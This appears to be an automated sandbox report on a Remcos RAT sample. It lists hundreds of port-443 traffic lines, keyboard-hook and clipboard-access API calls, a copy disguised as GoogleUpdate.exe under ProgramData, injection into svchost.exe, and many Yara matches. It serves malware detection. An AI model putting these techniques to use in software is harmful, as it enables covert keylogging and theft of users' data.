Source: unknown	Network traffic detected: HTTP traffic on port 49859 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60651 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53800
Source: unknown	Network traffic detected: HTTP traffic on port 49487 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54838 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55299 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61183 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58324 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53809
Source: unknown	Network traffic detected: HTTP traffic on port 62893 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53815
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53814
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53813
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53812
Source: unknown	Network traffic detected: HTTP traffic on port 61976 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53819
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53818
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53817
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53816
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53811
Source: unknown	Network traffic detected: HTTP traffic on port 61567 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62881 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53810
Source: unknown	Network traffic detected: HTTP traffic on port 53501 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64219 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50476 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53826
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53825
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53824
Source: unknown	Network traffic detected: HTTP traffic on port 59649 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53823
Source: unknown	Network traffic detected: HTTP traffic on port 51790 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53829
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53828
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53827
Source: unknown	Network traffic detected: HTTP traffic on port 55287 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53822
Source: unknown	Network traffic detected: HTTP traffic on port 64207 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53821
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53820
Source: unknown	Network traffic detected: HTTP traffic on port 58312 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61171 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64604 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61579 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49860 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54826 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53837
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53836
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53835
Source: unknown	Network traffic detected: HTTP traffic on port 54430 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53834
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53839
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53838
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53833
Source: unknown	Network traffic detected: HTTP traffic on port 53513 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53832
Source: unknown	Network traffic detected: HTTP traffic on port 50488 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53831
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53830
Source: unknown	Network traffic detected: HTTP traffic on port 59241 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53909 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61964 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49475 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60254 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63131
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63130
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51144
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51145
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51142
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51143
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51148
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51149
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51146
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51147
Source: unknown	Network traffic detected: HTTP traffic on port 56623 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63129
Source: unknown	Network traffic detected: HTTP traffic on port 65077 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59637 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51151
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51152
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51150
Source: unknown	Network traffic detected: HTTP traffic on port 53598 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63122
Source: unknown	Network traffic detected: HTTP traffic on port 60626 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63121
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63124
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63123
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63126
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63125
Source: unknown	Network traffic detected: HTTP traffic on port 53116 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63128
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63127
Source: unknown	Network traffic detected: HTTP traffic on port 65089 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63140
Source: unknown	Network traffic detected: HTTP traffic on port 64256 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63142
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63141
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51155
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51156
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51153
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51154
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51159
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51157
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51158
Source: unknown	Network traffic detected: HTTP traffic on port 54442 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51162
Source: unknown	Network traffic detected: HTTP traffic on port 57456 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51163
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51160
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51161
Source: unknown	Network traffic detected: HTTP traffic on port 50812 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63133
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63132
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63135
Source: unknown	Network traffic detected: HTTP traffic on port 50080 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63134
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63137
Source: unknown	Network traffic detected: HTTP traffic on port 64232 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63136
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63139
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63138
Source: unknown	Network traffic detected: HTTP traffic on port 56635 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63151
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63150
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63153
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63152
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51166
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51167
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51164
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51165
Source: unknown	Network traffic detected: HTTP traffic on port 60638 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51168
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51169
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51170
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51173
Source: unknown	Network traffic detected: HTTP traffic on port 64268 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51174
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51171
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51172
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63144
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63143
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63146
Source: unknown	Network traffic detected: HTTP traffic on port 49847 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63145
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63148
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63147
Source: unknown	Network traffic detected: HTTP traffic on port 59625 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63149
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63160
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63162
Source: unknown	Network traffic detected: HTTP traffic on port 50824 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63161
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63164
Source: unknown	Network traffic detected: HTTP traffic on port 57444 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63163
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51177
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51178
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51175
Source: unknown	Network traffic detected: HTTP traffic on port 53104 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51176
Source: unknown	Network traffic detected: HTTP traffic on port 61195 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64220 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51179
Source: unknown	Network traffic detected: HTTP traffic on port 50079 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51180
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51181
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51184
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51185
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51182
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51183
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63155
Source: unknown	Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63154
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63157
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63156
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63159
Source: unknown	Network traffic detected: HTTP traffic on port 53562 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63158
Source: unknown	Network traffic detected: HTTP traffic on port 54454 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51108
Source: unknown	Network traffic detected: HTTP traffic on port 56576 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51109
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51106
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53769
Source: unknown	Network traffic detected: HTTP traffic on port 59601 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51107
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53768
Source: unknown	Network traffic detected: HTTP traffic on port 54395 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53763
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51100
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51101
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53761
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53760
Source: unknown	Network traffic detected: HTTP traffic on port 57420 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50055 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51104
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53767
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51105
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53766
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51102
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53765
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51103
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53764
Source: unknown	Network traffic detected: HTTP traffic on port 61988 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53770
Source: unknown	Network traffic detected: HTTP traffic on port 63376 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50848 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57503 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51119
Source: unknown	Network traffic detected: HTTP traffic on port 56659 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51117
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53779
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51118
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51111
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53774
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51112
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53773
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51110
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53771
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51115
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53778
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51116
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53777
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51113
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53776
Source: unknown	Network traffic detected: HTTP traffic on port 54466 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59613 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51114
Source: unknown	Network traffic detected: HTTP traffic on port 53550 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53775
Source: unknown	Network traffic detected: HTTP traffic on port 56564 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56588 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 51704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53781
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53780
Source: unknown	Network traffic detected: HTTP traffic on port 50067 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60602 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51128
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51129
Source: unknown	Network traffic detected: HTTP traffic on port 65090 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53785
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51122
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51123
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53784
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51120
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53783
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51121
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53782
Source: unknown	Network traffic detected: HTTP traffic on port 57493 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53789
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51126
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51127
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53788
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51124
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53787
Source: unknown	Network traffic detected: HTTP traffic on port 63388 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51125
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53786
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63108
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63107
Source: unknown	Network traffic detected: HTTP traffic on port 50836 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54008 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63109
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53792
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51130
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53791
Source: unknown	Network traffic detected: HTTP traffic on port 57432 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53790
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63100
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63102
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63101
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63104
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63103
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63106
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63105
Source: unknown	Network traffic detected: HTTP traffic on port 54478 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51139
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63120
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51133
Source: unknown	Network traffic detected: HTTP traffic on port 52694 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53796
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51134
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53795
Source: unknown	Network traffic detected: HTTP traffic on port 49835 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51131
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53794
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51132
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53793
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51137
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53799
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51138
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53798
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51135
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51136
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53797
Source: unknown	Network traffic detected: HTTP traffic on port 60614 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56647 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63119
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63118
Source: unknown	Network traffic detected: HTTP traffic on port 53549 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51140
Source: unknown	Network traffic detected: HTTP traffic on port 64244 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51141
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63111
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63110
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63113
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63112
Source: unknown	Network traffic detected: HTTP traffic on port 64173 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63115
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63114
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63117
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63116
Source: unknown	Network traffic detected: HTTP traffic on port 52682 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56540 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 51728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61531 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54491 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50018 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 63340 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58361 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57527 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58373 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57515 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64185 -> 443

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to register a low level keyboard hook

Source: C:\Users\user\Desktop\DB5rQYsfd6.exe

Code function: 0_2_00409340 SetWindowsHookExA 0000000D,0040932C,00000000

0_2_00409340

Installs a global keyboard hook

Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe

Windows user hook set: 0 keyboard low level C:\ProgramData\GoogleDat\GoogleUpdate.exe

Jump to behavior

Source: C:\Users\user\Desktop\DB5rQYsfd6.exe

Code function: 0_2_0040A65A OpenClipboard,GetClipboardData,CloseClipboard,

0_2_0040A65A

Source: C:\Users\user\Desktop\DB5rQYsfd6.exe	Code function: 0_2_00414EC1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,	0_2_00414EC1
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: 10_2_00414EC1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,	10_2_00414EC1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 13_2_02D64EC1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,	13_2_02D64EC1
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: 15_2_00414EC1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,	15_2_00414EC1
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: 18_2_00414EC1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,	18_2_00414EC1

Source: C:\Users\user\Desktop\DB5rQYsfd6.exe

Code function: 0_2_0040A65A OpenClipboard,GetClipboardData,CloseClipboard,

0_2_0040A65A

Source: C:\Users\user\Desktop\DB5rQYsfd6.exe

Code function: 0_2_00409468 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,

0_2_00409468

E-Banking Fraud

Yara detected Remcos RAT

Source: Yara match	File source: DB5rQYsfd6.exe, type: SAMPLE
Source: Yara match	File source: 20.2.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.0.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.GoogleUpdate.exe.2a00000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.svchost.exe.2d50000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.svchost.exe.2d50000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.0.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.0.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.0.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.DB5rQYsfd6.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DB5rQYsfd6.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.0.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.GoogleUpdate.exe.6abe60.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.GoogleUpdate.exe.2a00000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.GoogleUpdate.exe.6abe60.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.1840917255.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.1664470390.0000000000456000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.1756643993.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.1917821912.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000000.1836764394.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.4123857872.0000000003230000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000000.1919217572.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.1919786507.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.1837263021.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.1762040408.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000000.1840006735.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000000.1917703042.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.1762879487.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000000.1689947215.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.4124186576.000000000068D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000000.1756098739.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.4126318500.0000000002A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.4123475358.0000000002D50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: DB5rQYsfd6.exe PID: 7308, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: GoogleUpdate.exe PID: 7888, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 7944, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: GoogleUpdate.exe PID: 8112, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: GoogleUpdate.exe PID: 8180, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: GoogleUpdate.exe PID: 1184, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: GoogleUpdate.exe PID: 1608, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: GoogleUpdate.exe PID: 7592, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: GoogleUpdate.exe PID: 7844, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\bootdata\logs.dat, type: DROPPED
